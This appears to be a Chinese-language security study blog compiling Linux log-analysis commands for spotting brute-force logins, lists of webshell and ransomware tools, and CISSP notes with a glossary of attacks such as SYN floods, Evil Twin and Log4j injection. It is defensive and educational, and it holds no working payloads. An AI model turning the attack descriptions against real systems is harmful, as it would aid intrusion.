一般,我們需要重點去關注secure安全日誌,檢查系統錯誤登陸日誌,統計IP重試次數,成功登錄的時間、用戶名和ip,確認賬號是否存在暴力破解或異常登錄的情況。

1、定位有多少IP在爆破主机的root帐号:grep "Failed password for root" /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more
定位有哪些IP在爆破:grep "Failed password" /var/log/secure|grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"|uniq -c
爆破用户名字典是什么? grep "Failed password" /var/log/secure|perl -e 'while($_=<>){ /for(.*?) from/; print "$1\n";}'|uniq -c|sort -nr
2、登录成功的IP有哪些:grep "Accepted " /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more
登录成功的日期、用户名、IP:grep "Accepted " /var/log/secure | awk '{print $1,$2,$3,$9,$11}'
3、增加一个用户kali日志:Jul 10 00:12:15 localhost useradd[2382]: new group: name=kali, GID=1001Jul 10 00:12:15 localhost useradd[2382]: new user: name=kali, UID=1001, GID=1001, home=/home/kali, shell=/bin/bashJul 10 00:12:58 localhost passwd: pam_unix(passwd:chauthtok): password changed for kali#grep "useradd" /var/log/secure
4、删除用户kali日志:Jul 10 00:14:17 localhost userdel[2393]: delete user 'kali'Jul 10 00:14:17 localhost userdel[2393]: removed group 'kali' owned by 'kali'Jul 10 00:14:17 localhost userdel[2393]: removed shadow group 'kali' owned by 'kali'# grep "userdel" /var/log/secure
5、su切换用户:Jul 10 00:38:13 localhost su: pam_unix(su-l:session): session opened for user good by root(uid=0)sudo授权执行:sudo -lJul 10 00:43:09 localhost sudo: good : TTY=pts/4 ; PWD=/home/good ; USER=root ; COMMAND=/sbin/shutdown -r now

三、常見Webshell查殺工具

D盾:

http://www.d99net.net

百度WEBDIR+

https://scanner.baidu.com

河馬

https://www.shellpub.com

Web Shell Detector

http://www.shelldetector.com

CloudWalker(牧雲)

https://webshellchop.chaitin.cn
深度学习模型检测PHP Webshell
http://webshell.cdxy.me

PHP Malware Finder

https://github.com/jvoisin/php-malware-finder

findWebshell

https://github.com/he1m4n6a/findWebshell

在線Webshell查殺工具

http://tools.bugscaner.com/killwebshell

四、如何發現隱藏的Webshell後門

那麼多代碼裡不可能我們一點點去找後門,另外,即使最好的Webshell查殺軟件也不可能完全檢測出來所有的後門,這個時候我們可以通過檢測文件的完整性來尋找代碼中隱藏的後門。

文件MD5校驗

絕大部分軟件,我們下載時都會有MD5文件,這個文件就是軟件開發者通過md5算法計算出該如軟件的“特徵值”,下載下來後,我們可以對比md5的值,如果一樣則表明這個軟件是安全的,如果不一樣則反之。

Linux中有一個命令:md5sum可以查看文件的md5值,同理,Windows也有命令或者工具可以查看文件的md5值

图片

Diff命令

Linux中的命令,可以查看两个文本文件的差异

文件對比工具

Beyond Compare
WinMerge

五、勒索病毒

勒索病毒搜索引擎

360:http://lesuobingdu.360.cn
腾讯:https://guanjia.qq.com/pr/ls
启明:https://lesuo.venuseye.com.cn
奇安信:https://lesuobingdu.qianxin.com
深信服:https://edr.sangfor.com.cn/#/information/ransom_search

勒索軟件解密工具集

腾讯哈勃:https://habo.qq.com/tool
金山毒霸:http://www.duba.net/dbt/wannacry.html
火绒:http://bbs.huorong.cn/forum-55-1.html
瑞星:http://it.rising.com.cn/fanglesuo/index.html
Nomoreransom:https://www.nomoreransom.org/zh/index.html
MalwareHunterTeam:https://id-ransomware.malwarehunterteam.com
卡巴斯基:https://noransom.kaspersky.com
Avast:https://www.avast.com/zh-cn/ransomware-decryption-tools
Emsisoft:https://www.emsisoft.com/ransomware-decryption-tools/free-download
Github勒索病毒解密工具收集汇总:https://github.com/jiansiting/Decryption-Tools

六、公眾號內以往介紹的文章工具

1、《工具:Windows安全檢查SeatBelt

2、《工具:Linux安全檢查GScan

資料來源:https://mp.weixin.qq.com/s/7zleF-HWBmN5IHFOsn8HWA

分類
CISSP

確保資訊安全的有效性,並達到符合性(合規性)要求,應優先遵循組織政策

https://ithelp.ithome.com.tw/upload/images/20211214/201321607KbYpA4FuQ.jpg
-政策框架
組織應當遵守法律法規。管理團隊應盡職盡責制定或審查政策以滿足法律和監管要求。
組織政策與法律或法規不一致並不一定意味著違規。組織政策可能會制定比法律或法規更高的標準。如果是這樣,員工只需要遵守政策。
相反,組織政策可能違反法律或法規。在這種情況下,管理團隊應修改政策,以便員工遵守。如果員工發現政策與法律法規相抵觸,應向管理層溝通或報告,並遵守新修訂的政策。
員工無視組織政策而直接遵守法律法規是不恰當的。如果違反法律或法規的政策被報告給管理層而被忽視,員工可能會遵循舉報程序。
毫無疑問,每個人都應遵守法律法規。組織應遵守政策,以確保員工遵守政策不會違反法律或法規。

資料來源: Wentz Wu QOTD-20210916

分類
Information Security

Log4j

Fadi分享這張圖很棒!log4j這次遇到injection攻擊,圖示展示注入LDAP語法。主要是在user-agent這個HTTP header注入語法,實在太簡單,又太厲害了!

分類
CISA

資訊科技服務管理

資訊科技服務管理(英語:IT Service Management,簡稱為IT services,縮寫為ITSM)也被稱為IT服務管理,是一種為了資訊科技管理所提供的訓練服務。很多ITSM系統的實現都是以IT 基礎設施庫(ITIL)為基礎來做的。

ITSM模組[編輯]

資料來源:https://zh.wikipedia.org/wiki/%E8%B3%87%E8%A8%8A%E7%A7%91%E6%8A%80%E6%9C%8D%E5%8B%99%E7%AE%A1%E7%90%86

分類
CISSP

安全功能(security function)

https://ithelp.ithome.com.tw/upload/images/20211213/20132160JmnTS9IiUS.png
-治理結構
https://ithelp.ithome.com.tw/upload/images/20211213/20132160kftUnOFGDT.jpg
-波特的價值鏈
職能通過開展將輸入轉化為有用結果的活動來產生價值。一個組織通常由直線職能和員工組成,以支持運營和交付價值。
組織級別的安全功能可由任何級別的員工執行,具體取決於相關組織的規模、規模和安全意識。大公司可以設立由CISO或經理領導的專門部門負責資訊安全,而資源較少的小公司可以簡單地指派一名IT工程師或任何員工來處理資訊安全事務。
審計職能通常由董事會下屬的審計委員會指導。它是一個獨立的組織單位,可確保合規性並提供保障。審計功能不包括或管理安全功能以保持其獨立性和客觀性。
安全職能應確保資訊安全的有效性,遵守法律、法規、行業標準、合同、組織政策、道德規範等要求;它通常與審計職能分開。

參考
工作人員和線路
直線和員工組織
正式組織 – 直線組織
行組織:含義、類型、優點和缺點
內部審計職能
構建未來的內部審計職能
AS 2605:考慮內部審計職能
審計部
什麼是安全功能
安全功能
資訊安全職能和職責

資料來源: Wentz Wu QOTD-20210911

分類
CISSP

Common Attacks

  1. Brute force:蠻力攻擊(英語:Brute-force attack),又稱為窮舉攻擊(英語:Exhaustive attack)或暴力破解,是一種密碼分析的方法,即將密碼進行逐個推算直到找出真正的密碼為止。
  2. Advanced Persistent Threat (APT):高級長期威脅(英語:advanced persistent threat,縮寫:APT),又稱高級持續性威脅、先進持續性威脅等,是指隱匿而持久的電腦入侵過程,通常由某些人員精心策劃,針對特定的目標。其通常是出於商業或政治動機,針對特定組織或國家,並要求在長時間內保持高隱蔽性。高級長期威脅包含三個要素:高級、長期、威脅。高級強調的是使用複雜精密的惡意軟體及技術以利用系統中的漏洞。長期暗指某個外部力量會持續監控特定目標,並從其獲取數據。威脅則指人為參與策劃的攻擊。
  3. Multi-vector, polymorphic attacks
  4. Buffer Overflows:緩衝區溢位(buffer overflow),在電腦學上是指標對程式設計缺陷,向程式輸入緩衝區寫入使之溢位的內容(通常是超過緩衝區能儲存的最巨量資料量的資料),從而破壞程式執行、趁著中斷之際並取得程式乃至系統的控制權。
  5. Mobile Code: ActiveX, JavaApplet, Flash, JavaScript
  6. Malicious Software (Malware)
  7. Drive-by download attacks:路過式下載,網頁掛馬攻擊 (Drive-by Downloads)
  8. Spyware
  9. Trojan Horse
  10. Keyloggers
  11. Password Crackers
  12. Spoofing欺騙
  13. Masquerading,偽裝
  14. Sniffers,竊聽
  15. Eavesdropping,竊聽(隔牆有耳)
  16. Tapping,竊聽
  17. Emanations 流出 and TEMPESTSpontaneous emission of electromagnetic radiation” (EMR) subject to TEMPEST eavesdropping受 TEMPEST 竊聽的自發“電磁輻射發射”(EMR)
  18. Shoulder Surfing靠肩竊聽
  19. Tailgating尾隨
  20. Piggybacking熟人夾帶
  21. Object Reuse物件重用
  22. Data Remanence資料殘留
  23. Unauthorized Targeted Data Mining未經授權的有針對性的數據挖掘
  24. Dumpster Diving垃圾搜尋
  25. Backdoor後門
  26. Trapdoor暗門
  27. Maintenance Hook維修門
  28. Logic bombs邏輯炸彈
  29. Social Engineering社交工程
  30. Phishing社交工程
  31. PharmingA cyber attack intended to redirect a website’s traffic to another, fake site.網址嫁接(Pharming)是1種重新導向(Re-dircert)的詐騙技巧,由網路釣魚(Phishing)衍生而來,藉由入侵使用者電腦、植入木馬程式(Trojan),或者是利用域名伺服器(Domain Name Server;DNS Server)的漏洞,將使用者錯誤地引導到偽造的網站中,並伺機竊取重要資料。竄改 DNS 造成 DNS Poisoning。
  32. Covert ChannelUnauthorized channel for data transportation
  33. IP Spoofing:IP詐騙IP Spoofing is malicious, while Masquerading is a specific form of Network Address Translation (NAT) and can be valid.
  34. IP Masquerading:IP偽裝
  35. Elevation of privilege:特權提升
  36. Privilege escalation:特權提升
  37. Tampering:篡改
  38. Sabotage:破壞
  39. SQL injection
  40. Cross-Site Scripting (XSS)
  41. Session Hijacking and Man-in-the-Middle Attacks
    1. 傳輸層安全 (TLS) 提供最有效的會話劫持防禦,因為它加密客戶端和服務器之間的所有流量,防止攻擊者竊取會話憑據。
  42. Zero-day exploitA zero-day exploit hits after a network vulnerability is announced or discovered but before a patch or solution is implemented.
  43. Race condition競爭危害(race hazard)又名競態條件競爭條件(race condition),它旨在描述一個系統或者進程的輸出依賴於不受控制的事件出現順序或者出現時機。此詞源自於兩個訊號試著彼此競爭,來影響誰先輸出。舉例來說,如果電腦中的兩個行程同時試圖修改一個共享記憶體的內容,在沒有並行控制的情況下,最後的結果依賴於兩個行程的執行順序與時機。而且如果發生了並行存取衝突,則最後的結果是不正確的。
  44. TOC/TOU:檢查時間/使用時間(TOC / TOU)。這是一個類型的異步攻擊時出現一些控制信息發生變化之間的一次系統的安全功能檢查內容的變量和時間變量實際操作過程中使用
  45. 推論(Inference):從已知信息派生新信息。推論問題是指這樣的事實,即可以在不清除用戶的級別上對導出的信息進行分類。推斷問題是用戶從他們獲取的合法信息中推斷出未經授權的信息。
  46. 聚合(Aggregation):處理敏感信息時,組合或合併不同數據單元的結果。以一個敏感度級別聚合數據可能會導致以較高敏感度級別指定總數據。
  47. 多重實例化(Polyinstantiation):多重實例化允許一個關係包含具有相同主鍵的多個行;多個實例通過其安全級別進行區分。
  48. Data diddling:數據欺騙是一種網絡犯罪,在這種網絡犯罪中,數據在輸入計算機系統時被更改,最常見的是數據輸入員或計算機病毒。對更改後的數據進行計算機處理會導致欺詐性收益。
  49. Salami attack:通常是指一系列許多小動作,通常是通過秘密手段進行的,因為累積的整體會產生更大的動作或結果,這些動作或結果難以立即執行。
  50. Frequency analysis (against classical ciphers):頻率分析 (Frequency analysis)
  51. Man-in-the-Middle (MITM)
  52. Meet-in-the-Middle:中間相遇攻擊使用已知的明文消息,並以蠻力方式同時使用明文加密和密文解密來識別加密密鑰,時間大約是對基本的蠻力攻擊的兩倍。 DES 算法
  53. Birthday attack
  54. ARP poisoning
  55. DNS cache poisoning/spoofing
  56. XSS:惡意用戶通過使用第三方站點誘使受害者的 Web 瀏覽器執行腳本的攻擊稱為跨站點腳本 (XSS) 攻擊。跨網站指令碼(Cross-site scripting,XSS)是一種網站應用程式的安全漏洞攻擊,是代碼注入的一種。它允許惡意使用者將程式碼注入到網頁上,其他使用者在觀看網頁時就會受到影響。這類攻擊通常包含了HTML以及使用者端腳本語言。
  57. CSRF:跨站請求偽造(Cross-site request forgery, CSRF / XSRF),也被稱為one-click attack 或者session riding, 是一種挾制用戶在當前已登錄的Web應用程式上執行非本意的操作的攻擊方法。跟跨網站指令碼(XSS)相比,XSS 利用的是用戶對指定網站的信任,CSRF 利用的是網站對用戶網頁瀏覽器的信任。
  58. XST:跨站點跟踪 (XST) 利用 HTTP TRACE 或 TRACK 方法,可用於通過跨站點腳本 (XSS) 竊取用戶的 cookie。
  59. POODLE(或 Padding Oracle On Downgraded Legacy Encryption)攻擊有助於迫使從 SSL 3.0 遷移到 TLS,因為它允許攻擊者輕鬆訪問 SSL 加密消息。
  60. ping Flood : ICMP echo request
  61. Nikto、Burp Suite 和 Wapiti 都是 Web 應用程序漏洞掃描器
  62. Nessus、OpenVAS、EU-U.S. Privacy Shield scanner and manager以及 SAINT 都是漏洞掃描工具
  63. zzuf 是一種模糊測試工具
  64. Watermarks:水印用於對數據進行數字標記,並可用於指示所有權。水印改變數字對象,以可見或隱藏形式嵌入有關來源的信息
  65. Metadata:元數據用於標記數據,可能有助於數據丟失防護系統在數據離開您的組織之前對其進行標記。
  66. SYN floods:SYN 泛洪依賴於機器和網絡設備上的 TCP 實現來導致拒絕服務條件。
  67. Callback :回撥會在遠程用戶初始連接後斷開其連接,然後通過預先授權的號碼回撥他們。
  68. Metasploit:Metasploit 提供了一個可擴展的框架,允許滲透測試人員在工具內置的漏洞之外創建自己的漏洞。但滲透測試只能覆蓋進行時的時間點。在進行滲透測試時,由於脆弱的服務而導致拒絕服務的可能性始終存在,但它可以通過驗證這些流程和政策如何工作的社會工程和運營測試來測試流程和政策。
  69. fragmented TCP packets ,發送碎片化 TCP 數據包的拒絕服務 (DoS) 攻擊。
  70. 密文攻擊:在網路上聽封包得來的…一堆亂碼…很難成功.
  71. 已知明文攻擊:已經知道有部分密文, 而這密文也有對應的明文ex: 明文:Bruce  加密後密文: Veyxw,主要是來發現金鑰, 可以逆推回去, 生日攻擊這一類的.
  72. ﹝選擇﹞明文攻擊:A攻擊者放出一條OOO的明文出去, 再去偷聽OOO被B擷取的封包,傳送給C的過程 逆向篹出加密運算
  73. ﹝選擇﹞密文攻擊:A攻擊者放出一條XXX的加密出去, 再去偷聽XXX被B擷取的封包,解密後再加密傳送給C的過程, 驗證對方的演算法是否被破解
  74. 密碼猜測攻擊(password‐cracking attack):通關密碼破解工具很容易取得,它們大概都採用兩種方法,一是使用工具在中間監看,一是提供密碼檔案(password file)進行字典攻擊(dictionary attack)。
  75. 後門攻擊(backdoor attack):後門的產生有兩種途徑,一種是軟體開發者原先設計的維護用後門(maintenance hook),另一種是侵入者留下的後門以便重新進入。
  76. 中間人攻擊(man‐in‐the‐middle attack):中間人攻擊是指在伺服器與使用者之間放置一個軟體,讓雙方都無法察覺。這個軟體攔截一方的資料,備份或篡改之後若無其事地傳送給另外一方。
  77. 重放攻擊(replay attack):重放(replay) 攻擊是指攻擊者攔截使用者登入資料,在稍後的時間再正式登入伺服器。重放攻擊對Kerberos之類的登入系統是有效的。
  78. 欺騙攻擊(spoofing attack):欺騙攻擊(spoofing) 是攻擊者偽裝成一個熟悉並且可信任的的伺服器或網站,藉以騙取登入資料或其他秘密資訊,如:網路釣魚(phishing)。
  79. Multipartite:File and MBR
    1. Multipartite virus多方病毒使用多種傳播機制在系統之間傳播。這提高了他們成功感染系統的可能性,因為它提供了替代感染機制,這些機制可能會成功對抗不易受主要感染機制影響的系統。
    2. 這類型病毒同時以數個方式攻擊電腦,例如感染boot sector,感染可執行檔,又去摧毀文字檔案。由於受害者不能同時修補所有的攻擊,它就有繼續寄生的機會。
  80. Stealth:Operating System
    1. 此類型病毒設計上具有隱藏的能力,可以避開一些防毒軟體的偵測。例如把自己隱身在硬碟的boot sector,或當病毒掃描時在不同的檔案間移動。
  81. Polymorphic:Self-modification
    1. 為了躲避掃毒工具的偵測,這類型病毒會利用變形的機制,在感染每一個檔案時產生不同資料內容。他使用的方法通常是利用加密編碼或是壓縮。
  82. Encrypted
    1. 加密病毒也會因感染而變異,但這樣做是通過在每個設備上使用不同的密鑰對自身進行加密來實現的
  83. 電容運動檢測器監控受監控區域的電磁場,感應與運動相對應的干擾。
  84. 安全內容自動化協議 (SCAP) 是一套用於處理漏洞和安全配置信息的規範
  85. Kerberos、KryptoKnight 和 SESAME 都是單點登錄或 SSO 系統
  86. LAND:在大地攻擊中,攻擊者發送具有相同源 IP 地址和目標 IP 地址的數據包,試圖使無法處理這種超出規範的流量的系統崩潰。
  87. 安全冠軍是軟體安全主題專家,他們在 OWASP 軟體保障成熟度模型 (SAMM) 中組織和文化的成熟度級別 1 中發揮著關鍵作用。提名一名成員,例如軟體開發人員、測試人員或產品經理,作為安全擁護者,有助於將安全嵌入到開發組織中。
  88. 在AES-128的基礎上, 質因數分解(RSA)的算法, 金鑰必須到3072, 而ECC只要256就可以達到相對於AES-128的強度了
  89. ping Flood 攻擊向目標系統發送迴聲請求。
  90. 死亡之Ping,(英文:ping of death, POD),是一種向目標電腦發送錯誤封包的或惡意的ping指令的攻擊方式。通常,一次ping大小為32位元組(若考慮IP標頭則為84位元組)。在當時,大部分電腦無法處理大於IPv4最大封包大小(65,535位元組)的ping封包。因此發送這樣大小的ping可以令目標電腦崩潰。
  91. 任何支持單點登錄SSO 的系統都會受到散列傳遞攻擊的影響憑據重用:在保存憑據的系統上使用已保存憑據。憑據盜竊:將保存的憑據帶到另一個系統並從那裡使用它,並允許攻擊者在網絡上傳播。

Cryptanalysis(密碼分析)破密金鑰被猜到密文解密,被還原出任何有意義的資料

  1. Key Cluster金鑰叢集:不同金鑰產出同一密文
  2. Ciphertext Only
  3. Know Plaintext(weaker codes)
  4. Chosen Plaintext,中途島
  5. Chosen Ciphertext(Key)
  6. Analytic Attack(Algorithm)
  7. Statistical Attack(Cryptosystem)
  8. Implementation Attack(Software)
  9. Brute Force暴力攻擊
  10. Key Space:所有組合的可能性
  11. Birthday Attack(Hash)
  12. “Meet” in the Middle(2DES)
  13. Frequency Analysis頻率分析

Wifi攻擊

  1. War Driving
    1. 開車繞一圈蒐集有多少基地台
      1. 基地台使用哪種協定
      2. 是否使用預設密碼
  2. War Chalking
    1. 將蒐集來的做記號(Ex.阿里巴巴做記號)
  3. Evil Twin (完全模仿你,訊號強就會連結過來)
    1. 如公共基地台 (用相同的 SSID 與相同金鑰)
      1. 將筆電模擬成 AP

藍芽攻擊

  1. 訊號側錄(中間人攻擊)
  2. Bluesnarfing使攻擊者能夠利用較舊的(大約在2003年)設備中的固件漏洞來訪問支持Bluetooth的設備。這種攻擊會強制與藍牙設備建立連接,從而允許訪問存儲在設備上的數據,包括該設備的國際移動設備身份(IMED)。IMEI是每個設備的唯一標識符,攻擊者可能會將其用於將所有傳入呼叫從用戶設備路由到攻擊者設備。
    1. 利用較舊設備中的硬體漏洞
  3. 藍牙劫持 (Bluejacking):藍牙劫持是在支援藍牙的行動裝置(如手機)上進行的攻擊。攻擊者通過向啟用藍牙的設備的使用者發送未經請求的消息來發起劫持。實際消息不會對使用者的設備造成傷害,但可能會誘使用戶以某種方式做出回應或將新聯繫人添加到設備的通訊簿中。此郵件發送攻擊類似於針對電子郵件用戶進行的垃圾郵件和網路釣魚攻擊。當用戶啟動對出於有害意圖發送的藍牙劫持消息的回應時,劫持可能會造成傷害。
    1. 向藍芽裝置發送未經請求的信件(垃圾郵件)
  4. Bluebugging:Bluebugging利用某些較舊(大約在2004年)藍牙設備的固件中的安全漏洞來訪問該設備及其命令。此攻擊在不通知用戶的情況下使用設備的命令,從而使攻擊者可以訪問數據,撥打電話,竊聽電話,發送消息以及利用設備提供的其他服務或功能。
    1. 藍芽臭蟲,利用較舊設備中的安全漏洞
  5. Car Whisperer:Car Whisperer是由歐洲安全研究人員開發的一種軟件工具,該工具利用了汽車中安裝的免提藍牙汽車套件中標準(非隨機)密碼的使用。Car Whisperer軟件允許攻擊者向車載套件發送音頻或從車載套件接收音頻。攻擊者可以將音頻傳輸到汽車的揚聲器或從汽車中的麥克風接收音頻(竊聽)。
  6. 拒絕服務 (Denial of Service):與其他無線技術一樣,藍牙容易受到DoS攻擊。影響包括使設備的藍牙接口無法使用以及耗盡設備的電池。這些類型的攻擊並不重要,並且由於使用藍牙所需的接近性,通常只需移開範圍即可輕鬆避免。
  7. 模糊攻擊(Fuzzing Attacks):藍牙模糊攻擊包括將格式錯誤或其他非標準數據發送到設備的藍牙無線電,並觀察設備的反應。如果設備的運行因這些攻擊而減慢或停止,則協議棧中可能存在嚴重的漏洞。
  8. 配對竊聽的(Pairing Eavesd ropping):PIN /舊式配對(藍牙2.0及更早版本)和低能耗的舊式配對容易受到竊聽攻擊。收集所有配對幀的成功竊聽者可以在給定足夠的時間的情況下確定一個或多個秘密密鑰,從而允許可信設備模擬和主動/被動數據解密。
  9. 安全的簡單配對攻擊(Secure Simple Pair ing Attacks):有多種技術可以迫使遠程設備使用Just Works SSP,然後利用其缺乏MITM保護的功能(例如,攻擊設備聲稱它沒有輸入/輸出功能)。此外,固定的密鑰也可以使攻擊者也可以執行MITM攻擊。

Side-channel Attacks

  1. Power  Consumption
    1. Timing information
    2. Electromagnetic emissions
    3. Acoustic(Sound)emissions
  2. Control Zone against TEMPEST
    1. Faraday cage
    2. White noise
  3. 側通道(side-channel)攻擊是針對硬體的攻擊, 常見的是時序分析及錯誤分析(故意製造錯誤).
    1. 基於從電腦所產生的物理設計中獲取的資訊(聲音、功率、光學等),並使用這些資訊來反向工程電腦正在執行的操作。

干擾

  1. 延遲是數據包從源到目的地的傳輸延遲。
  2. 抖動是不同數據包延遲的變化。
  3. 數據包丟失是傳輸過程中需要重新傳輸的數據包的消失。
  4. 干擾是電噪聲或其他破壞數據包內容的中斷。

Data-link layer attack

  • ARP Attacks
  • MAC Spoofing
  • DHCP Spoofing
  • Virtual LAN Hopping
  • CAM Table Overflows
  • Spanning Tree Protocol Attacks
  • CDP/LLDP Reconnaissance

Network layer attack

  • Teardrop Attack 淚珠攻擊:利用IP封包重組的漏洞進行攻擊。發送一堆經特別設計過的封包片段到目標電腦,這 一堆封包片段包含了重疊的位移值,這使得這堆封 包重組成原來的IP 封包時,導致網路服務主機誤判 封包大小,造成系統當機現象。
  • Smurf attack藍色小精靈:偽造來源,Ping各方。
    • 大量產生假造的ICMP echo Request封包 – 將假造的封包送至廣播位址,然後廣播位址會 傳回大量的ICMP echo reply封包給目標電腦。
  • LAND Attack:攻擊者利用 IP 偽裝的技術修改即將送出的封 包,將其來源與目的 IP 位址均改成是目標機 器的 IP 位址,以及將來源與目標連接埠也改 為一樣。來源與目的的IP位止相同 來源與目的的連接埠相同。
  • TCP SYN (SYN flood):
    • 針對攻擊目標送出一連串具有假的來源位址的SYN 封包。
    • 受攻擊的系統會將尚未收到ACK回應的SYN封包暫 存於佇列中,直到收到對方的ACK回應或超過逾期 時間才移除。
    • 系統會因為收不到ACK回應,而使得佇列中充滿著 暫存的SYN封包而無法再處理其它使用者的請求。
  • Ping of Death:經由發送過大的 ping 請求 (ICMP echo request) ,以造成緩衝區溢位 (Overflow),繼而導致無法正常運作或當機。

併購中的網絡安全評估網絡安全審計已成為併購盡職調查過程中必不可少的一步,這凸顯了保持強大安全態勢的重要性。(ISC)2 研究的結果清楚地表明,組織網絡安全計劃的健康狀況直接影響潛在交易的價值。公司的網絡安全歷史很重要。以前未公開的違規行為可能會破壞交易,薄弱的安全措施可能會被視為一種責任。忽視網絡安全重要性的公司並沒有最大限度地發揮其價值。網絡安全實力是影響底線的真正考慮因素。對於買家來說,密切關注目標公司的網絡安全歷史是必須的。雖然公司最終可能會決定繼續進行交易,但即使過去發生過違規行為,網絡安全審計也至關重要。忽視審計揭示的令人不安的跡象可能會帶來影響,可能會在收購或合併後使公司貶值。因此,在進行交易之前,買家有責任驗證目標公司是否具備所有必要的安全控制措施。

Mitre attack
Mitre Shield

資料來源:https://blog.angelz13.com/2021/12/common-attacks.html

分類
CISSP

滲透測試-列舉可用的服務和資源

https://ithelp.ithome.com.tw/upload/images/20211206/20132160n80a1W6HiT.jpg
-滲透測試方法
使用 CVE 進行漏洞掃描通常遵循識別和枚舉端口、服務和資源的情況。進行滲透測試並不是一個絕對的順序,而是一種常見的做法。

參考
CEH 黑客方法

資料來源: Wentz Wu QOTD-20210911

分類
CISSP

實施零信任架構以防止橫向移動,XACML最不可能進行身份驗證

https://ithelp.ithome.com.tw/upload/images/20211201/20132160Y2ag06gT1I.jpg
-示例 XACML 實現
XACML 旨在支持授權,而不是身份驗證。
XACML 代表“可擴展訪問控制標記語言”。該標准定義了一種聲明性細粒度、基於屬性的訪問控制策略語言、架構和處理模型,描述瞭如何根據策略中定義的規則評估訪問請求。
-資料來源:維基百科

縮寫 學期 描述
PAP 政策管理點 管理訪問授權策略的點
PDP 政策決策點 在發布訪問決定之前根據授權策略評估訪問請求的點
PEP 政策執行點 攔截用戶對資源的訪問請求,向PDP發出決策請求以獲得訪問決策
(即對資源的訪問被批准或拒絕),並根據收到的決策採取行動的點
PIP 政策信息點 充當屬性值來源的系統實體(即資源、主題、環境)
PRP 策略檢索點 XACML 訪問授權策略的存儲點,通常是數據庫或文件系統。
-資料來源:維基百科

端口敲門和單包授權 (Port Knocking and Single Packet Authorization
:SPA)

802.1X是為認證而設計的,用於網絡訪問控制,而端口敲門是傳輸層的一種認證機制。連接嘗試的正確順序可以被視為身份驗證的秘密。只有當端口敲門序列正確時,防火牆才會動態地允許連接。
在 計算機聯網, 端口碰撞 是從外部打開方法 的端口 上的 防火牆 通過產生一組預先指定關閉的端口的連接嘗試。一旦接收到正確的連接嘗試序列,防火牆規則就會動態修改以允許發送連接嘗試的主機通過特定端口進行連接。存在一種稱為單包授權 (SPA) 的變體 ,其中只需要一次“敲門”,由加密 包組成 。
資料來源:維基百科

PKI 和 802.1X
公鑰基礎設施 (PKI) 和 802.1X 通常用於在 VPN、LAN 或無線網絡環境中進行身份驗證。
https://ithelp.ithome.com.tw/upload/images/20211201/201321607or5cYGhuB.jpg
-VPN 和 EAP

參考
敲端口

資料來源: Wentz Wu QOTD-20210910

分類
CISSP

RESTful API

用戶或資源所有者向身份提供者而不是聯合系統中的資源或 API 服務器進行身份驗證。身份提供者向客戶端提供令牌,以便它可以訪問 API 服務器。
HTTPS 強制保密,但 POST 方法沒有。使用 POST 方法的 HTTP 請求以明文形式傳輸。
API 有一個漏洞,可以在設計階段通過威脅建模儘早識別。
RESTful API
RESTful API 通常可以通過基本 URI 訪問,使用標準 HTTP 方法並返回媒體類型。HTTP 請求 GET https://api.WentzWu.com/user/ {username}/{password} 看起來像一個 RESTful API 請求。但是,我們不知道 API 如何返回結果,也不能斷定它是 RESTful。

以下是維基百科關於 RESTful API 的總結:
表現層狀態轉換(REST) 是一種軟體架構風格,旨在指導萬維網架構的設計和開發。REST 已被整個軟件行業採用,並且是一套被廣泛接受的用於創建無狀態、可靠的 Web API 的指南。
遵守 REST 架構約束的 Web 服務 API 稱為 RESTful API。基於 HTTP 的 RESTful API 的定義有以下幾個方面:
–基本 URI,例如http://api.example.com/;
–標準 HTTP 方法(例如,GET、POST、PUT 和 DELETE);
–定義狀態轉換數據元素的媒體類型(例如,Atom、微格式、application/vnd.collection+json、[13]:91-99 等)。當前表示告訴客戶端如何編寫轉換到所有下一個可用應用程序狀態的請求。這可以像 URI 一樣簡單,也可以像 Java 小程序一樣複雜。

參考
表象狀態轉移
一個不好的例子:裸奔的帳密就在你我身邊

資料來源: Wentz Wu QOTD-20210909

分類
CISSP

風險評鑑(risk assessment)

https://ithelp.ithome.com.tw/upload/images/20211129/20132160Vu6KW3p74V.jpg
-NIST SDLC 和 RMF
NIST RMF 的第一步,Categorize System,通過評估系統處理的資訊類型的高水位來確定係統的影響級別,以便根據系統特定的要求選擇和定製或修改一組基線控制,作為風險評估的結果。
資訊安全政策是關鍵和高水平的。它沒有直接定制安全控制的詳細或特定要求。

資料來源: Wentz Wu QOTD-20210908

分類
CISSP

(ISC)² 道德準則

(ISC)² 道德準則僅適用於 (ISC)² 會員。垃圾郵件發送者的身份不明或匿名,這些垃圾郵件發送者不請自來,吹捧代理考生在 CISSP 考試中作弊。換句話說,他們不一定是 (ISC)² 成員。作為 CISSP,只有在您確定垃圾郵件發送者是 (ISC)² 成員的情況下,您才能向 (ISC)² 提交投訴,說明違反了道德規範的規範。

所有獲得 (ISC)² 認證的信息安全專業人員都承認,此類認證是一項必須獲得和維護的特權。為了支持這一原則,所有 (ISC)² 成員都必須承諾完全支持本道德準則(“準則”)。(ISC)² 成員故意或故意違反本準則的任何條款將受到同行評審小組的製裁,這可能會導致認證被撤銷。(ISC)² 會員有義務在發現 (ISC)² 會員違反本準則的任何行為後遵守道德投訴程序。不這樣做可能會被視為違反Canon IV 的準則。
資料來源: (ISC)²

參考
(ISC)² 道德準則
Hack-Back:邁向網絡自衛的法律框架
回擊利弊:反擊前您需要了解的內容

資料來源: Wentz Wu QOTD-20210907

分類
Information Security

EDR、NDR、XDR、MDR – 檢測和響應的不同概念

“威脅檢測和響應”現在被認為是保護企業網絡不可或缺的手段。由於環境規模大,需求日益複雜,因此應盡可能主動、快速、高效、自動地發現或預防潛在的危險和威脅,並恢復或清理相應的系統。

一組三個字母可以隱藏市場上提供的幾種類型的“檢測和響應”模型。這些首字母縮略詞代表什麼?一種解決方案與另一種解決方案的區別是什麼?

以下是您需要了解的內容的概述。

EDR

…代表’端點檢測和響應’。連接到網絡的每台設備都代表來自 Internet 的威脅的潛在攻擊媒介,並且這些連接中的每一個都是通往您的數據的潛在網關。一般而言,EDR 解決方案從端點收集數據,使用它來識別潛在威脅,並提供有用的方法來調查和響應這些潛在威脅——現代解決方案甚至可以通過後續報告實現自動化。

  • 範圍:端點和主機
  • 意圖:端點/接入區域保護免受滲透、監控和緩解、漏洞評估、警報和響應
